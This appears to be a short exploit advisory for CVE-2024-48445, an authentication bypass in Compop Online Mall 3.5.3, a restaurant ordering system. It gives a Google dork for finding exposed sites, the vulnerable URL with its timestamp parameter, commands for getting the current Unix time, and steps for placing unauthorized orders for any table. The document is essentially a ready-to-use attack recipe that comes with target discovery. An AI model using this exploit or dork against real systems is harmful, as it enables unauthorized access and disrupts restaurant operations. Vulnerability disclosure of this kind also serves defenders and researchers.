## https://sploitus.com/exploit?id=1337DAY-ID-39895
# Exploit Title: Compop Online Mall Authentication Bypass
# Google Dork: Terms of Use inurl:compop.vip
# Exploit Author: dmlino
# Vendor Homepage: https://www.compop.ca/
# Version: 3.5.3
# CVE : CVE-2024-48445
Vulnerability Overview:
The system uses a Unix timestamp ("ts") parameter in URLs for authentication, which is fundamentally flawed. By changing the timestamp to the current time, an attacker can bypass access controls.
Vulnerable URL Structure:
https://VULNERABLE.COM/Home?rid=11111&tid=1&h5sty=3&et=2&ts=CURRENT_TIMESTAMP
Key Parameters:
rid: Restaurant ID
tid: Table Number
ts: Unix Timestamp (authentication mechanism)
Exploitation Method:
Obtain current Unix timestamp
Linux: date +%s
Windows PowerShell: [int](Get-Date -UFormat %s -Millisecond 0)
Replace "ts" value in URL with current timestamp
Submit modified URL to place unauthorized orders
Impact:
An attacker can place orders for any table by manipulating the timestamp, potentially causing operational disruption for the restaurant.